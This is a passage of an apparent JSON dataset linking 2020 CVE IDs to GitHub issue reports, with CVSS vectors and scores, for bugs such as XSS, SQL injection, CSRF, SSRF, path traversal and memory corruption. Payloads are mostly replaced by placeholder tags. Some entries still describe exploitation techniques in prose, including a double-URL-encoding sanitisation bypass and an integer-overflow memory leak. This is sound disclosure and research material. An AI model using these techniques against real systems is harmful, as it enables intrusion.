  56801. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/7",
  56802. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/7",
  56803. "Repo_new": "xwlrbh/catfish",
  56804. "Issue_Created_At": "2020-07-08T04:03:53Z",
  56805. "description": "XSS in \"announcement\" plugin. Catfish CMS NUMBERTAG allows XSS via the \"announcement\" plugin, the parameter \"announcement_gonggao\" in url FILETAG set the parameter : announcement_gonggao: \"> APITAG open the index page ,the js is run.",
  56806. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56807. "severity": "MEDIUM",
  56808. "baseScore": 6.1,
  56809. "impactScore": 2.7,
  56810. "exploitabilityScore": 2.8
  56811. },
  56812. {
  56813. "CVE_ID": "CVE-2020-24000",
  56814. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/13",
  56815. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/13",
  56816. "Repo_new": "weng-xianhu/eyoucms",
  56817. "Issue_Created_At": "2020-07-09T16:50:20Z",
  56818. "description": "There is SQL injection in your source code. The vulnerability affects FILETAG , tid URL encoded POST input tid was set to NUMBERTAG Use APITAG FILETAG",
  56819. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56820. "severity": "CRITICAL",
  56821. "baseScore": 9.8,
  56822. "impactScore": 5.9,
  56823. "exploitabilityScore": 3.9
  56824. },
  56825. {
  56826. "CVE_ID": "CVE-2020-24025",
  56827. "Issue_Url_old": "https://github.com/sass/node-sass/issues/3067",
  56828. "Issue_Url_new": "https://github.com/sass/node-sass/issues/3067",
  56829. "Repo_new": "sass/node-sass",
  56830. "Issue_Created_At": "2021-02-05T08:32:48Z",
  56831. "description": "Security Vulnerability Issue CVETAG ]. [ URLTAG URLTAG Certificate validation in node sass NUMBERTAG to NUMBERTAG is disabled when requesting binaries even if the user is not specifying an alternative download path. URLTAG URLTAG Version NUMBERTAG was released in October, but through reading the source code of NUMBERTAG we found that this issue is still unresolved. Is there a plan to fix this issue?",
  56832. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  56833. "severity": "MEDIUM",
  56834. "baseScore": 5.3,
  56835. "impactScore": 1.4,
  56836. "exploitabilityScore": 3.9
  56837. },
  56838. {
  56839. "CVE_ID": "CVE-2020-24026",
  56840. "Issue_Url_old": "https://github.com/jianyan74/TinyShop/issues/14",
  56841. "Issue_Url_new": "https://github.com/jianyan74/tinyshop/issues/14",
  56842. "Repo_new": "jianyan74/tinyshop",
  56843. "Issue_Created_At": "2020-07-12T12:16:11Z",
  56844. "description": "XSS vulnerability in reply to product reviews. APITAG a free and open source mall based on APITAG has a stored XSS vulnerability that affects version NUMBERTAG APITAG allows XSS via the explain_first and again_explain parameters of the FILETAG page. Backend open source address: URLTAG Front end open source address: URLTAG rageframe2: URLTAG view images: POC APITAG APITAG",
  56845. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56846. "severity": "MEDIUM",
  56847. "baseScore": 6.1,
  56848. "impactScore": 2.7,
  56849. "exploitabilityScore": 2.8
  56850. },
  56851. {
  56852. "CVE_ID": "CVE-2020-24074",
  56853. "Issue_Url_old": "https://github.com/kn007/silk-v3-decoder/issues/62",
  56854. "Issue_Url_new": "https://github.com/kn007/silk-v3-decoder/issues/62",
  56855. "Repo_new": "kn007/silk-v3-decoder",
  56856. "Issue_Created_At": "2020-06-05T18:28:58Z",
  56857. "description": "The decoder has a stack overflow. The decoder has a stack overflow At NUMBERTAG lines of code in Decoder.c CODETAG SKP_int NUMBERTAG APITAG FILETAG Then the size of the copy is a very large number, resulting in a buffer overflow Test file: URLTAG CODETAG",
  56858. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56859. "severity": "CRITICAL",
  56860. "baseScore": 9.8,
  56861. "impactScore": 5.9,
  56862. "exploitabilityScore": 3.9
  56863. },
  56864. {
  56865. "CVE_ID": "CVE-2020-24119",
  56866. "Issue_Url_old": "https://github.com/upx/upx/issues/388",
  56867. "Issue_Url_new": "https://github.com/upx/upx/issues/388",
  56868. "Repo_new": "upx/upx",
  56869. "Issue_Created_At": "2020-07-22T09:10:40Z",
  56870. "description": "Heap buffer overflow in APITAG What's the problem (or question)? A heap buffer overflow read in the latest commit APITAG URLTAG of the devel branch ASAN reports: ERRORTAG What should have happened? Check if the file is normal, exit if abnormal Do you have an idea for a solution? Add more checks How can we reproduce the issue? upx.out d APITAG poc: FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: Ubuntu NUMBERTAG LTS Host CPU architecture NUMBERTAG Target Operating System and version: same as Host Target CPU architecture: same as Host",
  56871. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56872. "severity": "HIGH",
  56873. "baseScore": 7.1,
  56874. "impactScore": 5.2,
  56875. "exploitabilityScore": 1.8
  56876. },
  56877. {
  56878. "CVE_ID": "CVE-2020-24130",
  56879. "Issue_Url_old": "https://github.com/ponzu-cms/ponzu/issues/352",
  56880. "Issue_Url_new": "https://github.com/ponzu-cms/ponzu/issues/352",
  56881. "Repo_new": "ponzu-cms/ponzu",
  56882. "Issue_Created_At": "2020-07-27T07:21:58Z",
  56883. "description": "There is three CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following three pages NUMBERTAG FILETAG Add a administrator. ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG FILETAG Delete a administrator use username(email), and the param 'id' is not useful, you can delete any user you think username(email). ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG FILETAG It can edit configure, example NUMBERTAG Change HTTP Basic Auth APITAG to download a backup of your data via HTTP NUMBERTAG Change administrator email and used with FILETAG NUMBERTAG Change Client Secret which is used to validate requests. ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ~~~",
  56884. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  56885. "severity": "HIGH",
  56886. "baseScore": 8.1,
  56887. "impactScore": 5.2,
  56888. "exploitabilityScore": 2.8
  56889. },
  56890. {
  56891. "CVE_ID": "CVE-2020-24135",
  56892. "Issue_Url_old": "https://github.com/vedees/wcms/issues/9",
  56893. "Issue_Url_new": "https://github.com/vedees/wcms/issues/9",
  56894. "Repo_new": "vedees/wcms",
  56895. "Issue_Created_At": "2020-07-20T15:12:03Z",
  56896. "description": "Reflected XSS vulnerability. Hi, dev team! There is Reflected XSS vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG Example POC: Just send any js code in type parameter like: APITAG Reflected cross site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. To prevent xss use next manual: URLTAG Please let me know about any fixes, I would like to register CVE number.",
  56897. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56898. "severity": "MEDIUM",
  56899. "baseScore": 6.1,
  56900. "impactScore": 2.7,
  56901. "exploitabilityScore": 2.8
  56902. },
  56903. {
  56904. "CVE_ID": "CVE-2020-24136",
  56905. "Issue_Url_old": "https://github.com/vedees/wcms/issues/12",
  56906. "Issue_Url_new": "https://github.com/vedees/wcms/issues/12",
  56907. "Repo_new": "vedees/wcms",
  56908. "Issue_Created_At": "2020-07-20T15:25:18Z",
  56909. "description": "Path Traversal vulnerability in PATHTAG Hi, dev team! There is Path Traversal vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: CODETAG A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files To prevent vulnerability use next manual: URLTAG (prevent section) Please let me know about any fixes, I would like to register CVE number.",
  56910. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  56911. "severity": "HIGH",
  56912. "baseScore": 8.6,
  56913. "impactScore": 4.0,
  56914. "exploitabilityScore": 3.9
  56915. },
  56916. {
  56917. "CVE_ID": "CVE-2020-24137",
  56918. "Issue_Url_old": "https://github.com/vedees/wcms/issues/7",
  56919. "Issue_Url_new": "https://github.com/vedees/wcms/issues/7",
  56920. "Repo_new": "vedees/wcms",
  56921. "Issue_Created_At": "2020-07-20T14:57:42Z",
  56922. "description": "Path Traversal vulnerability . Hi, dev team! There is Path Traversal vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Example POC: CODETAG A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files To prevent vulnerability use next manual: URLTAG (prevent section) Please let me know about any fixes, I would like to register CVE number.",
  56923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  56924. "severity": "MEDIUM",
  56925. "baseScore": 5.3,
  56926. "impactScore": 1.4,
  56927. "exploitabilityScore": 3.9
  56928. },
  56929. {
  56930. "CVE_ID": "CVE-2020-24138",
  56931. "Issue_Url_old": "https://github.com/vedees/wcms/issues/10",
  56932. "Issue_Url_new": "https://github.com/vedees/wcms/issues/10",
  56933. "Repo_new": "vedees/wcms",
  56934. "Issue_Created_At": "2020-07-20T15:19:07Z",
  56935. "description": "Reflected XSS vulnerability. Hi, dev team! There is Reflected XSS vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: Just send any js code in pagename parameter like: APITAG Reflected cross site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. To prevent xss use next manual: URLTAG Please let me know about any fixes, I would like to register CVE number.",
  56936. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56937. "severity": "MEDIUM",
  56938. "baseScore": 6.1,
  56939. "impactScore": 2.7,
  56940. "exploitabilityScore": 2.8
  56941. },
  56942. {
  56943. "CVE_ID": "CVE-2020-24139",
  56944. "Issue_Url_old": "https://github.com/vedees/wcms/issues/8",
  56945. "Issue_Url_new": "https://github.com/vedees/wcms/issues/8",
  56946. "Repo_new": "vedees/wcms",
  56947. "Issue_Created_At": "2020-07-20T15:05:53Z",
  56948. "description": "SSRF Vulnerability . Hi, dev team! There is SSRF Vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Example POC: CODETAG Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using APITAG scheme) To prevent vulnerability use next manual: FILETAG Please let me know about any fixes, I would like to register CVE number.",
  56949. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
  56950. "severity": "HIGH",
  56951. "baseScore": 8.3,
  56952. "impactScore": 3.7,
  56953. "exploitabilityScore": 3.9
  56954. },
  56955. {
  56956. "CVE_ID": "CVE-2020-24140",
  56957. "Issue_Url_old": "https://github.com/vedees/wcms/issues/11",
  56958. "Issue_Url_new": "https://github.com/vedees/wcms/issues/11",
  56959. "Repo_new": "vedees/wcms",
  56960. "Issue_Created_At": "2020-07-20T15:22:21Z",
  56961. "description": "SSRF Vulnerability in PATHTAG Hi, dev team! There is SSRF Vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: APITAG Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using APITAG scheme) To prevent vulnerability use next manual: FILETAG Please let me know about any fixes, I would like to register CVE number.",
  56962. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
  56963. "severity": "HIGH",
  56964. "baseScore": 8.3,
  56965. "impactScore": 3.7,
  56966. "exploitabilityScore": 3.9
  56967. },
  56968. {
  56969. "CVE_ID": "CVE-2020-24164",
  56970. "Issue_Url_old": "https://github.com/ptaoussanis/nippy/issues/130",
  56971. "Issue_Url_new": "https://github.com/ptaoussanis/nippy/issues/130",
  56972. "Repo_new": "ptaoussanis/nippy",
  56973. "Issue_Created_At": "2020-07-24T15:47:42Z",
  56974. "description": "Remote Code Execution vulnerability via Java's Serializable interface. Details coming",
  56975. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56976. "severity": "HIGH",
  56977. "baseScore": 7.8,
  56978. "impactScore": 5.9,
  56979. "exploitabilityScore": 1.8
  56980. },
  56981. {
  56982. "CVE_ID": "CVE-2020-24213",
  56983. "Issue_Url_old": "https://github.com/Fluorohydride/ygopro/issues/2314",
  56984. "Issue_Url_new": "https://github.com/fluorohydride/ygopro/issues/2314",
  56985. "Repo_new": "fluorohydride/ygopro",
  56986. "Issue_Created_At": "2020-07-31T14:38:56Z",
  56987. "description": "Security Issue: Memory leak.. Memory leak This vulnerability happened when the function APITAG and APITAG been used. When the player sends a package with error 'mainc' size and 'sidec' size, the function APITAG haven't check those parameters is legal or not. Then this function will calculate the sum of those parameters. ERRORTAG The algorithm thinks 'mainc' and 'sidec' are two unsigned number, so there is an integer overflow, when we set those parameters like NUMBERTAG their sum will be zero. It is ok though but in the function APITAG it will cause a buffer overread. ERRORTAG We can see in this function, the parameters 'mainc' and 'sidec' were treat as two int type numbers. So if we set 'mainc' as NUMBERTAG fffffff' and 'sidec' as NUMBERTAG in this function it will read 'dbuf' from range NUMBERTAG to NUMBERTAG Function APITAG also do a important thing: If the memory's data can be found in APITAG function, then it will add it into 'deck'; Else if APITAG function can't find memory's data in database, it will record it in the errorcode and return. Then in the APITAG function, the errorcode will be writen into 'deck_error[dp >type]'. Now we can see the function APITAG ERRORTAG This function will check 'deck_error[dp >type]', if it is not zero, it will pack the errcode into 'scem' structure and send it to players. Thanks to it, we can get an easy way to leak the program memory. And here is my test program, it works well in my local environment. URLTAG",
  56988. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  56989. "severity": "HIGH",
  56990. "baseScore": 7.5,
  56991. "impactScore": 3.6,
  56992. "exploitabilityScore": 3.9
  56993. },
  56994. {
  56995. "CVE_ID": "CVE-2020-24263",
  56996. "Issue_Url_old": "https://github.com/portainer/portainer/issues/4105",
  56997. "Issue_Url_new": "https://github.com/portainer/portainer/issues/4105",
  56998. "Repo_new": "portainer/portainer",
  56999. "Issue_Created_At": "2020-07-27T03:51:32Z",
  57000. "description": "Disable Container Capabilities for non admins. We currently provide the ability for a user to specify additional container capabilities when deploying a container, both using the container UX and also via a compose file. There are certain capabilities that could be escalate privilege higher than a user should need for reasonable activities, and therefore may be deemed a security risk. We need to provide a new security option that allows the administrator to disable the ability for non admin users to manually set container capabilities. This change should be reflected in the front end (remove the option to set capabilities), and also the backend (to block the use via stacks or API).",
  57001. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  57002. "severity": "HIGH",
  57003. "baseScore": 8.8,
  57004. "impactScore": 5.9,
  57005. "exploitabilityScore": 2.8
  57006. },
  57007. {
  57008. "CVE_ID": "CVE-2020-24264",
  57009. "Issue_Url_old": "https://github.com/portainer/portainer/issues/4106",
  57010. "Issue_Url_new": "https://github.com/portainer/portainer/issues/4106",
  57011. "Repo_new": "portainer/portainer",
  57012. "Issue_Created_At": "2020-07-27T03:57:20Z",
  57013. "description": "enforce the security switch \"disable the use of bind mounts\" when set via API. Right now we allow the Portainer administrator to \"disable the use of bind mounts by non admins\", which is purely a front end restriction, and is more of a \"hide the capability\". This feature stops using from selecting to use bind mounts in the container / service creation views, and stops the use of bind mounts when writing stacks. However, if a skilled user was to craft an API request to Portainer that included bind mounts, it would succeed as there is no backend enforcement. To ensure security, we should enforce this restriction via the backend so that it cannot be used through the Portainer API.",
  57014. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57015. "severity": "CRITICAL",
  57016. "baseScore": 9.8,
  57017. "impactScore": 5.9,
  57018. "exploitabilityScore": 3.9
  57019. },
  57020. {
  57021. "CVE_ID": "CVE-2020-24265",
  57022. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/616",
  57023. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/616",
  57024. "Repo_new": "appneta/tcpreplay",
  57025. "Issue_Created_At": "2020-07-30T07:46:09Z",
  57026. "description": "FILETAG Expected behavior Get an a.cach at the path or exit when meet abnormal input. System : Tcpreplay Version NUMBERTAG tcpprep V ERRORTAG OS: ubuntu NUMBERTAG Additional context none.",
  57027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57028. "severity": "HIGH",
  57029. "baseScore": 7.5,
  57030. "impactScore": 3.6,
  57031. "exploitabilityScore": 3.9
  57032. },
  57033. {
  57034. "CVE_ID": "CVE-2020-24266",
  57035. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/617",
  57036. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/617",
  57037. "Repo_new": "appneta/tcpreplay",
  57038. "Issue_Created_At": "2020-07-30T08:41:03Z",
  57039. "description": "FILETAG Expected behavior Get an a.cach at the path or exit when meet abnormal input. System (please complete the following information): Tcpreplay Version NUMBERTAG tcpprep V ERRORTAG OS: ubuntu NUMBERTAG Additional context None.",
  57040. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57041. "severity": "HIGH",
  57042. "baseScore": 7.5,
  57043. "impactScore": 3.6,
  57044. "exploitabilityScore": 3.9
  57045. },
  57046. {
  57047. "CVE_ID": "CVE-2020-24301",
  57048. "Issue_Url_old": "https://github.com/jamesagnew/hapi-fhir/issues/2026",
  57049. "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/2026",
  57050. "Repo_new": "hapifhir/hapi-fhir",
  57051. "Issue_Created_At": "2020-08-08T20:05:26Z",
  57052. "description": "XSS Vulnerability in Testpage Overlay. Thanks to Will Davison of NCC Group APITAG UK) for disclosing this vulnerability. Text of disclosure follows: > Evidence \u2013 Reflected XSS: > > It was possible to send a GET request to the HAPI FHIR Web Application such that any included malicious code would be executed in the victim\u2019s browser. This could be used to craft a phishing link, for example. > > By URL encoding twice, it was possible to bypass any sanitisation on URL parameters which were reflected In the page body. > The following double URL encoded payload was used to display an alert box: > > APITAG > > URL encoding once transforms the string into: > APITAG > URL encoding once more gives us our final payload of: > APITAG > > Being used to craft a APITAG Link such as: > URLTAG > > In the above example, the vulnerable parameter is \u201cid\u201d but this should also work for vid and account. It\u2019s likely that this issue is present in a few places, but I have not exhaustively tested. I would recommend reviewing the code in order to ensure both input sanitisation and output encoding are consistent across the application. > OWASP\u2019s Cheat Sheet series may be of some use here: FILETAG This vulnerability affects only users of the APITAG Overlay\" HAPI FHIR module. Maven coordinates for this module are: APITAG ca. APITAG APITAG hapi fhir testpage overlay Affected versions are any versions NUMBERTAG and below. This issue is resolved in version NUMBERTAG Analysis: Users of the HAPI FHIR Testpage Overlay can use a specially crafted URL to exploit an XSS vulnerability in this module, allowing arbitrary APITAG to be executed in the user's browser. The impact of this vulnerability is believed to be low, as this module is intended for testing and not believed to be widely used for any production purposes. Nonetheless, we recommend all users of the affected module upgrade immediately. A complete audit of the affected codebase has been completed in order to detect and resolve any similar issues.",
  57053. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  57054. "severity": "MEDIUM",
  57055. "baseScore": 6.1,
  57056. "impactScore": 2.7,
  57057. "exploitabilityScore": 2.8
  57058. },
  57059. {
  57060. "CVE_ID": "CVE-2020-24327",
  57061. "Issue_Url_old": "https://github.com/purple-WL/Discourse-sending-email-function-exist-Server-side-request-forgery-SSRF-/issues/1",
  57062. "Issue_Url_new": "https://github.com/purple-wl/discourse-sending-email-function-exist-server-side-request-forgery-ssrf-/issues/1",
  57063. "Repo_new": "purple-wl/discourse-sending-email-function-exist-server-side-request-forgery-ssrf-",
  57064. "Issue_Created_At": "2020-08-12T07:04:02Z",
  57065. "description": "exploitation of vulnerability . APITAG send a new email FILETAG APITAG to upload images from a website FILETAG NUMBERTAG send mail FILETAG APITAG email has been sent. FILETAG APITAG remote server received a GET request from the site\uff01 FILETAG",
  57066. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  57067. "severity": "MEDIUM",
  57068. "baseScore": 5.3,
  57069. "impactScore": 1.4,
  57070. "exploitabilityScore": 3.9
  57071. },
  57072. {
  57073. "CVE_ID": "CVE-2020-24343",
  57074. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/136",
  57075. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/136",
  57076. "Repo_new": "ccxvii/mujs",
  57077. "Issue_Created_At": "2020-06-28T19:13:31Z",
  57078. "description": "APITAG heap use after free PATHTAG in APITAG git hash: APITAG cmd: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
  57079. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57080. "severity": "HIGH",
  57081. "baseScore": 7.8,
  57082. "impactScore": 5.9,
  57083. "exploitabilityScore": 1.8
  57084. },
  57085. {
  57086. "CVE_ID": "CVE-2020-24344",
  57087. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3976",
  57088. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3976",
  57089. "Repo_new": "jerryscript-project/jerryscript",
  57090. "Issue_Created_At": "2020-07-05T20:43:50Z",
  57091. "description": "Heap overflow in jerry core. APITAG revision git hash: APITAG Test case ERRORTAG In debug build, it triggers an assertion 'scope_stack_p > context_p >scope_stack_p' failed Execution steps ./jerry FILETAG Build cmd python tools/build.py compile flag=\" fsanitize=address\" Stack dump: ERRORTAG",
  57092. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  57093. "severity": "HIGH",
  57094. "baseScore": 7.1,
  57095. "impactScore": 5.2,
  57096. "exploitabilityScore": 1.8
  57097. },
  57098. {
  57099. "CVE_ID": "CVE-2020-24345",
  57100. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3977",
  57101. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3977",
  57102. "Repo_new": "jerryscript-project/jerryscript",
  57103. "Issue_Created_At": "2020-07-06T05:01:36Z",
  57104. "description": "Stack overflow in ecma_is_lexical_environment. APITAG revision git hash: APITAG Test case ERRORTAG Execution steps ./jerry FILETAG Build cmd python tools/build.py compile flag=\" fsanitize=address\" Stack dump: ERRORTAG",
  57105. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57106. "severity": "HIGH",
  57107. "baseScore": 7.8,
  57108. "impactScore": 5.9,
  57109. "exploitabilityScore": 1.8
  57110. },
  57111. {
  57112. "CVE_ID": "CVE-2020-24346",
  57113. "Issue_Url_old": "https://github.com/nginx/njs/issues/325",
  57114. "Issue_Url_new": "https://github.com/nginx/njs/issues/325",
  57115. "Repo_new": "nginx/njs",
  57116. "Issue_Created_At": "2020-06-28T18:40:42Z",
  57117. "description": "heap use after free in njs_json_parse_iterator_call. Version: APITAG , git commit APITAG POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
  57118. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  57119. "severity": "HIGH",
  57120. "baseScore": 7.8,
  57121. "impactScore": 5.9,
  57122. "exploitabilityScore": 1.8
  57123. },
  57124. {
  57125. "CVE_ID": "CVE-2020-24347",
  57126. "Issue_Url_old": "https://github.com/nginx/njs/issues/323",
  57127. "Issue_Url_new": "https://github.com/nginx/njs/issues/323",
  57128. "Repo_new": "nginx/njs",
  57129. "Issue_Created_At": "2020-06-27T19:58:35Z",
  57130. "description": "Segfault in njs_lvlhsh_bucket_find. Version: APITAG , git commit APITAG POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
  57131. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  57132. "severity": "MEDIUM",
  57133. "baseScore": 5.5,
  57134. "impactScore": 3.6,
  57135. "exploitabilityScore": 1.8
  57136. },
  57137. {
  57138. "CVE_ID": "CVE-2020-24348",
  57139. "Issue_Url_old": "https://github.com/nginx/njs/issues/322",
  57140. "Issue_Url_new": "https://github.com/nginx/njs/issues/322",
  57141. "Repo_new": "nginx/njs",
  57142. "Issue_Created_At": "2020-06-27T19:55:59Z",
  57143. "description": "Segfault in njs_json_stringify_iterator. Version: APITAG , git commit APITAG POC: CODETAG cmd: APITAG Stack dump: ERRORTAG",
  57144. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  57145. "severity": "MEDIUM",
  57146. "baseScore": 5.5,
  57147. "impactScore": 3.6,
  57148. "exploitabilityScore": 1.8
  57149. },
  57150. {
  57151. "CVE_ID": "CVE-2020-24349",
  57152. "Issue_Url_old": "https://github.com/nginx/njs/issues/324",
  57153. "Issue_Url_new": "https://github.com/nginx/njs/issues/324",
  57154. "Repo_new": "nginx/njs",
  57155. "Issue_Created_At": "2020-06-27T20:07:39Z",
  57156. "description": "Control flow hijack in njs_value_property. Version: APITAG , git commit APITAG This bug is likely exploitable. POC: ERRORTAG cmd: APITAG Stack dump: ERRORTAG",
  57157. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  57158. "severity": "MEDIUM",
  57159. "baseScore": 5.5,
  57160. "impactScore": 3.6,
  57161. "exploitabilityScore": 1.8
  57162. },
  57163. {
  57164. "CVE_ID": "CVE-2020-24368",
  57165. "Issue_Url_old": "https://github.com/Icinga/icingaweb2/issues/4226",
  57166. "Issue_Url_new": "https://github.com/icinga/icingaweb2/issues/4226",
  57167. "Repo_new": "icinga/icingaweb2",
  57168. "Issue_Created_At": "2020-08-14T12:33:43Z",
  57169. "description": "Placeholder.",
  57170. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57171. "severity": "HIGH",
  57172. "baseScore": 7.5,
  57173. "impactScore": 3.6,
  57174. "exploitabilityScore": 3.9
  57175. },
  57176. {
  57177. "CVE_ID": "CVE-2020-24372",
  57178. "Issue_Url_old": "https://github.com/LuaJIT/LuaJIT/issues/603",
  57179. "Issue_Url_new": "https://github.com/luajit/luajit/issues/603",
  57180. "Repo_new": "luajit/luajit",
  57181. "Issue_Created_At": "2020-07-14T01:15:30Z",
  57182. "description": "Second segfault in lj_err_run. Hi, we found a crash in APITAG Version NUMBERTAG Git hash: APITAG POC: ERRORTAG Stack dump: ERRORTAG",
  57183. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57184. "severity": "HIGH",
  57185. "baseScore": 7.5,
  57186. "impactScore": 3.6,
  57187. "exploitabilityScore": 3.9
  57188. },
  57189. {
  57190. "CVE_ID": "CVE-2020-24381",
  57191. "Issue_Url_old": "https://github.com/gunet/openeclass/issues/39",
  57192. "Issue_Url_new": "https://github.com/gunet/openeclass/issues/39",
  57193. "Repo_new": "gunet/openeclass",
  57194. "Issue_Created_At": "2020-08-17T16:03:50Z",
  57195. "description": "Improper Access Control by Directory Listing Misconfiguration. Improper Access Control by Directory Listing Misconfiguration that affects all versions When the webapp is poorly configured (directory listing is enabled), an unauthenticated user will be able to view and download students' uploaded assessments. APITAG Course link URLTAG Add \"work\" directory at the end URLTAG",
  57196. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  57197. "severity": "HIGH",
  57198. "baseScore": 7.5,
  57199. "impactScore": 3.6,
  57200. "exploitabilityScore": 3.9
  57201. },
  57202. {
  57203. "CVE_ID": "CVE-2020-24391",
  57204. "Issue_Url_old": "https://github.com/mongodb-js/query-parser/issues/16",
  57205. "Issue_Url_new": "https://github.com/mongodb-js/query-parser/issues/16",
  57206. "Repo_new": "mongodb-js/query-parser",
  57207. "Issue_Created_At": "2020-01-07T06:21:42Z",
  57208. "description": "Migrate to vm2 instead of safer eval. Hi! safer eval URLTAG is now considered unsafe. A safer option would be vm2 URLTAG . This only requires changes in APITAG which shouldn't be too bad. I'm trying to get a PR up in the next two weeks.",
  57209. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57210. "severity": "CRITICAL",
  57211. "baseScore": 9.8,
  57212. "impactScore": 5.9,
  57213. "exploitabilityScore": 3.9
  57214. },
  57215. {
  57216. "CVE_ID": "CVE-2020-24566",
  57217. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6564",
  57218. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6564",
